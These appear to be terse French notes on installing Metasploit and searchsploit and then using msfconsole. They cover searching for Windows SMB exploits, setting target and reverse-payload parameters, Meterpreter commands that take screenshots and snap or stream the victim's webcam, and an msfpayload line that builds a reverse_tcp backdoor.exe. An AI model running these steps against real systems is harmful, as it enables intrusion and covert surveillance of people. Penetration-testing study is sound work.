# vraiment eu comme utilité libpq5 libpq-dev libsqlite3-dev sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev cd /opt/ git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework gem install bundler bundle install sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
S'il y a des soucis de compilation de modules, il est très recommandé de regarder dans les log de compilation qui seront conseillé en fin de sortie de commande.
En seulement deux commandes :
git clone https://github.com/offensive-security/exploit-database.git /opt/exploit-database ln -sf /opt/exploit-database/searchsploit /usr/local/bin/searchsploit
Il sera alors pas la suite possible de mettre à jours la base :
searchsploit -u
msfconsole
msf update
show exploits search name:smb type:exploit platform:windows use <exploit> set rhost 10.0.45.14 set rport 1234
show payloads set payload <payload> set lhost <ip_machine> set lport 4321 run //use <multi/handler>
exploit
sysinfo
ps
screenshot
shell
webcam_list
webcam_snap
webcam_stream
shutdown
msfpayload <windows/meterpreter/reverse_tcp HOST=192.168.0.125 PORT=4444 x > /usr/backdoor.exe
Donc création du payload avant de lancer l'exploit